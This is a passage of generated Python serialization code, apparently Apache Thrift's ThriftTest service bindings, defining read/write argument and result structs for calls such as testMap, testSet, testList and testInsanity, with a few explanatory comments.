iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.thing = Xtruct2()
self.thing.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('testNest_args')
if self.thing is not None:
oprot.writeFieldBegin('thing', TType.STRUCT, 1)
self.thing.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, getattr(self, key))
for key in self.__slots__]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
for attr in self.__slots__:
my_val = getattr(self, attr)
other_val = getattr(other, attr)
if my_val != other_val:
return False
return True
def __ne__(self, other):
return not (self == other)
all_structs.append(testNest_args)
testNest_args.thrift_spec = (
None, # 0
(1, TType.STRUCT, 'thing', [Xtruct2, None], None, ), # 1
)
class testNest_result(object):
"""
Attributes:
- success
"""
__slots__ = (
'success',
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRUCT:
self.success = Xtruct2()
self.success.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('testNest_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.STRUCT, 0)
self.success.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, getattr(self, key))
for key in self.__slots__]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
for attr in self.__slots__:
my_val = getattr(self, attr)
other_val = getattr(other, attr)
if my_val != other_val:
return False
return True
def __ne__(self, other):
return not (self == other)
all_structs.append(testNest_result)
testNest_result.thrift_spec = (
(0, TType.STRUCT, 'success', [Xtruct2, None], None, ), # 0
)
class testMap_args(object):
"""
Attributes:
- thing
"""
__slots__ = (
'thing',
)
def __init__(self, thing=None,):
self.thing = thing
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.MAP:
self.thing = {}
(_ktype264, _vtype265, _size263) = iprot.readMapBegin()
for _i267 in range(_size263):
_key268 = iprot.readI32()
_val269 = iprot.readI32()
self.thing[_key268] = _val269
iprot.readMapEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('testMap_args')
if self.thing is not None:
oprot.writeFieldBegin('thing', TType.MAP, 1)
oprot.writeMapBegin(TType.I32, TType.I32, len(self.thing))
for kiter270, viter271 in self.thing.items():
oprot.writeI32(kiter270)
oprot.writeI32(viter271)
oprot.writeMapEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, getattr(self, key))
for key in self.__slots__]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
for attr in self.__slots__:
my_val = getattr(self, attr)
other_val = getattr(other, attr)
if my_val != other_val:
return False
return True
def __ne__(self, other):
return not (self == other)
all_structs.append(testMap_args)
testMap_args.thrift_spec = (
None, # 0
(1, TType.MAP, 'thing', (TType.I32, None, TType.I32, None, False), None, ), # 1
)
class testMap_result(object):
"""
Attributes:
- success
"""
__slots__ = (
'success',
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.MAP:
self.success = {}
(_ktype273, _vtype274, _size272) = iprot.readMapBegin()
for _i276 in range(_size272):
_key277 = iprot.readI32()
_val278 = iprot.readI32()
self.success[_key277] = _val278
iprot.readMapEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('testMap_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.MAP, 0)
oprot.writeMapBegin(TType.I32, TType.I32, len(self.success))
for kiter279, viter280 in self.success.items():
oprot.writeI32(kiter279)
oprot.writeI32(viter280)
oprot.writeMapEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, getattr(self, key))
for key in self.__slots__]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
for attr in self.__slots__:
my_val = getattr(self, attr)
other_val = getattr(other, attr)
if my_val != other_val:
return False
return True
def __ne__(self, other):
return not (self == other)
all_structs.append(testMap_result)
testMap_result.thrift_spec = (
(0, TType.MAP, 'success', (TType.I32, None, TType.I32, None, False), None, ), # 0
)
class testStringMap_args(object):
"""
Attributes:
- thing
"""
__slots__ = (
'thing',
)
def __init__(self, thing=None,):
self.thing = thing
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.MAP:
self.thing = {}
(_ktype282, _vtype283, _size281) = iprot.readMapBegin()
for _i285 in range(_size281):
_key286 = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
_val287 = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
self.thing[_key286] = _val287
iprot.readMapEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('testStringMap_args')
if self.thing is not None:
oprot.writeFieldBegin('thing', TType.MAP, 1)
oprot.writeMapBegin(TType.STRING, TType.STRING, len(self.thing))
for kiter288, viter289 in self.thing.items():
oprot.writeString(kiter288.encode('utf-8') if sys.version_info[0] == 2 else kiter288)
oprot.writeString(viter289.encode('utf-8') if sys.version_info[0] == 2 else viter289)
oprot.writeMapEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, getattr(self, key))
for key in self.__slots__]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
for attr in self.__slots__:
my_val = getattr(self, attr)
other_val = getattr(other, attr)
if my_val != other_val:
return False
return True
def __ne__(self, other):
return not (self == other)
all_structs.append(testStringMap_args)
testStringMap_args.thrift_spec = (
None, # 0
(1, TType.MAP, 'thing', (TType.STRING, 'UTF8', TType.STRING, 'UTF8', False), None, ), # 1
)
class testStringMap_result(object):
"""
Attributes:
- success
"""
__slots__ = (
'success',
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.MAP:
self.success = {}
(_ktype291, _vtype292, _size290) = iprot.readMapBegin()
for _i294 in range(_size290):
_key295 = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
_val296 = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
self.success[_key295] = _val296
iprot.readMapEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('testStringMap_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.MAP, 0)
oprot.writeMapBegin(TType.STRING, TType.STRING, len(self.success))
for kiter297, viter298 in self.success.items():
oprot.writeString(kiter297.encode('utf-8') if sys.version_info[0] == 2 else kiter297)
oprot.writeString(viter298.encode('utf-8') if sys.version_info[0] == 2 else viter298)
oprot.writeMapEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, getattr(self, key))
for key in self.__slots__]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
for attr in self.__slots__:
my_val = getattr(self, attr)
other_val = getattr(other, attr)
if my_val != other_val:
return False
return True
def __ne__(self, other):
return not (self == other)
all_structs.append(testStringMap_result)
testStringMap_result.thrift_spec = (
(0, TType.MAP, 'success', (TType.STRING, 'UTF8', TType.STRING, 'UTF8', False), None, ), # 0
)
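
# The sys.version_info checks above exist because readString() returns bytes
# on Python 2 (decoded here to unicode) but already returns str on Python 3.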
class testSet_args(object):
"""
Attributes:
- thing
"""
__slots__ = (
'thing',
)
def __init__(self, thing=None,):
self.thing = thing
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.SET:
self.thing = set()
(_etype302, _size299) = iprot.readSetBegin()
for _i303 in range(_size299):
_elem304 = iprot.readI32()
self.thing.add(_elem304)
iprot.readSetEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('testSet_args')
if self.thing is not None:
oprot.writeFieldBegin('thing', TType.SET, 1)
oprot.writeSetBegin(TType.I32, len(self.thing))
for iter305 in self.thing:
oprot.writeI32(iter305)
oprot.writeSetEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, getattr(self, key))
for key in self.__slots__]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
for attr in self.__slots__:
my_val = getattr(self, attr)
other_val = getattr(other, attr)
if my_val != other_val:
return False
return True
def __ne__(self, other):
return not (self == other)
all_structs.append(testSet_args)
testSet_args.thrift_spec = (
None, # 0
(1, TType.SET, 'thing', (TType.I32, None, False), None, ), # 1
)
class testSet_result(object):
"""
Attributes:
- success
"""
__slots__ = (
'success',
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.SET:
self.success = set()
(_etype309, _size306) = iprot.readSetBegin()
for _i310 in range(_size306):
_elem311 = iprot.readI32()
self.success.add(_elem311)
iprot.readSetEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('testSet_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.SET, 0)
oprot.writeSetBegin(TType.I32, len(self.success))
for iter312 in self.success:
oprot.writeI32(iter312)
oprot.writeSetEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, getattr(self, key))
for key in self.__slots__]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
for attr in self.__slots__:
my_val = getattr(self, attr)
other_val = getattr(other, attr)
if my_val != other_val:
return False
return True
def __ne__(self, other):
return not (self == other)
all_structs.append(testSet_result)
testSet_result.thrift_spec = (
(0, TType.SET, 'success', (TType.I32, None, False), None, ), # 0
)
class testList_args(object):
"""
Attributes:
- thing
"""
__slots__ = (
'thing',
)
def __init__(self, thing=None,):
self.thing = thing
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.LIST:
self.thing = []
(_etype316, _size313) = iprot.readListBegin()
for _i317 in range(_size313):
_elem318 = iprot.readI32()
self.thing.append(_elem318)
iprot.readListEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('testList_args')
if self.thing is not None:
oprot.writeFieldBegin('thing', TType.LIST, 1)
oprot.writeListBegin(TType.I32, len(self.thing))
for iter319 in self.thing:
oprot.writeI32(iter319)
oprot.writeListEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, getattr(self, key))
for key in self.__slots__]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
for attr in self.__slots__:
my_val = getattr(self, attr)
other_val = getattr(other, attr)
if my_val != other_val:
return False
return True
def __ne__(self, other):
return not (self == other)
all_structs.append(testList_args)
testList_args.thrift_spec = (
None, # 0
(1, TType.LIST, 'thing', (TType.I32, None, False), None, ), # 1
)
class testList_result(object):
"""
Attributes:
- success
"""
__slots__ = (
'success',
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.LIST:
self.success = []
(_etype323, _size320) = iprot.readListBegin()
for _i324 in range(_size320):
_elem325 = iprot.readI32()
self.success.append(_elem325)
iprot.readListEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('testList_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.LIST, 0)
oprot.writeListBegin(TType.I32, len(self.success))
for iter326 in self.success:
oprot.writeI32(iter326)
oprot.writeListEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, getattr(self, key))
for key in self.__slots__]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
for attr in self.__slots__:
my_val = getattr(self, attr)
other_val = getattr(other, attr)
if my_val != other_val:
return False
return True
def __ne__(self, other):
return not (self == other)
all_structs.append(testList_result)
testList_result.thrift_spec = (
(0, TType.LIST, 'success', (TType.I32, None, False), None, ), # 0
)
class testEnum_args(object):
"""
Attributes:
- thing
"""
__slots__ = (
'thing',
)
def __init__(self, thing=None,):
self.thing = thing
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I32:
self.thing = iprot.readI32()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('testEnum_args')
if self.thing is not None:
oprot.writeFieldBegin('thing', TType.I32, 1)
oprot.writeI32(self.thing)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, getattr(self, key))
for key in self.__slots__]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
for attr in self.__slots__:
my_val = getattr(self, attr)
other_val = getattr(other, attr)
if my_val != other_val:
return False
return True
def __ne__(self, other):
return not (self == other)
all_structs.append(testEnum_args)
testEnum_args.thrift_spec = (
None, # 0
(1, TType.I32, 'thing', None, None, ), # 1
)
class testEnum_result(object):
"""
Attributes:
- success
"""
__slots__ = (
'success',
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.I32:
self.success = iprot.readI32()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('testEnum_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.I32, 0)
oprot.writeI32(self.success)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, getattr(self, key))
for key in self.__slots__]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
for attr in self.__slots__:
my_val = getattr(self, attr)
other_val = getattr(other, attr)
if my_val != other_val:
return False
return True
def __ne__(self, other):
return not (self == other)
all_structs.append(testEnum_result)
testEnum_result.thrift_spec = (
(0, TType.I32, 'success', None, None, ), # 0
)
class testTypedef_args(object):
"""
Attributes:
- thing
"""
__slots__ = (
'thing',
)
def __init__(self, thing=None,):
self.thing = thing
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.thing = iprot.readI64()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('testTypedef_args')
if self.thing is not None:
oprot.writeFieldBegin('thing', TType.I64, 1)
oprot.writeI64(self.thing)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, getattr(self, key))
for key in self.__slots__]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
for attr in self.__slots__:
my_val = getattr(self, attr)
other_val = getattr(other, attr)
if my_val != other_val:
return False
return True
def __ne__(self, other):
return not (self == other)
all_structs.append(testTypedef_args)
testTypedef_args.thrift_spec = (
None, # 0
(1, TType.I64, 'thing', None, None, ), # 1
)
class testTypedef_result(object):
"""
Attributes:
- success
"""
__slots__ = (
'success',
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.I64:
self.success = iprot.readI64()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('testTypedef_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.I64, 0)
oprot.writeI64(self.success)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, getattr(self, key))
for key in self.__slots__]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
for attr in self.__slots__:
my_val = getattr(self, attr)
other_val = getattr(other, attr)
if my_val != other_val:
return False
return True
def __ne__(self, other):
return not (self == other)
all_structs.append(testTypedef_result)
testTypedef_result.thrift_spec = (
(0, TType.I64, 'success', None, None, ), # 0
)
class testMapMap_args(object):
"""
Attributes:
- hello
"""
__slots__ = (
'hello',
)
def __init__(self, hello=None,):
self.hello = hello
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I32:
self.hello = iprot.readI32()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('testMapMap_args')
if self.hello is not None:
oprot.writeFieldBegin('hello', TType.I32, 1)
oprot.writeI32(self.hello)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, getattr(self, key))
for key in self.__slots__]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
for attr in self.__slots__:
my_val = getattr(self, attr)
other_val = getattr(other, attr)
if my_val != other_val:
return False
return True
def __ne__(self, other):
return not (self == other)
all_structs.append(testMapMap_args)
testMapMap_args.thrift_spec = (
None, # 0
(1, TType.I32, 'hello', None, None, ), # 1
)
class testMapMap_result(object):
"""
Attributes:
- success
"""
__slots__ = (
'success',
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.MAP:
self.success = {}
(_ktype328, _vtype329, _size327) = iprot.readMapBegin()
for _i331 in range(_size327):
_key332 = iprot.readI32()
_val333 = {}
(_ktype335, _vtype336, _size334) = iprot.readMapBegin()
for _i338 in range(_size334):
_key339 = iprot.readI32()
_val340 = iprot.readI32()
_val333[_key339] = _val340
iprot.readMapEnd()
self.success[_key332] = _val333
iprot.readMapEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('testMapMap_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.MAP, 0)
oprot.writeMapBegin(TType.I32, TType.MAP, len(self.success))
for kiter341, viter342 in self.success.items():
oprot.writeI32(kiter341)
oprot.writeMapBegin(TType.I32, TType.I32, len(viter342))
for kiter343, viter344 in viter342.items():
oprot.writeI32(kiter343)
oprot.writeI32(viter344)
oprot.writeMapEnd()
oprot.writeMapEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, getattr(self, key))
for key in self.__slots__]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
for attr in self.__slots__:
my_val = getattr(self, attr)
other_val = getattr(other, attr)
if my_val != other_val:
return False
return True
def __ne__(self, other):
return not (self == other)
all_structs.append(testMapMap_result)
testMapMap_result.thrift_spec = (
(0, TType.MAP, 'success', (TType.I32, None, TType.MAP, (TType.I32, None, TType.I32, None, False), False), None, ), # 0
)
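
# Container spec args nest recursively: a MAP entry reads as
# (key type, key spec args, value type, value spec args, immutable?), so the
# two-level map above embeds an inner (TType.I32, None, TType.I32, None, False).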
class testInsanity_args(object):
"""
Attributes:
- argument
"""
__slots__ = (
'argument',
)
def __init__(self, argument=None,):
self.argument = argument
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.argument = Insanity.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('testInsanity_args')
if self.argument is not None:
oprot.writeFieldBegin('argument', TType.STRUCT, 1)
self.argument.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, getattr(self, key))
for key in self.__slots__]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
for attr in self.__slots__:
my_val = getattr(self, attr)
other_val = getattr(other, attr)
if my_val != other_val:
return False
return True
def __ne__(self, other):
return not (self == other)
all_structs.append(testInsanity_args)
testInsanity_args.thrift_spec = (
None, # 0
(1, TType.STRUCT, 'argument', [Insanity, None], None, ), # 1
)
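
# Note: Insanity is decoded via the classmethod-style Insanity.read(iprot)
# rather than "x = Insanity(); x.read(iprot)" as with Xtruct -- the pattern the
# Python generator emits for structs marked immutable in the IDL.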
class testInsanity_result(object):
"""
Attributes:
- success
"""
__slots__ = (
'success',
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.MAP:
self.success = {}
(_ktype346, _vtype347, _size345) = iprot.readMapBegin()
for _i349 in range(_size345):
_key350 = iprot.readI64()
_val351 = {}
(_ktype353, _vtype354, _size352) = iprot.readMapBegin()
for _i356 in range(_size352):
_key357 = iprot.readI32()
_val358 = Insanity.read(iprot)
_val351[_key357] = _val358
iprot.readMapEnd()
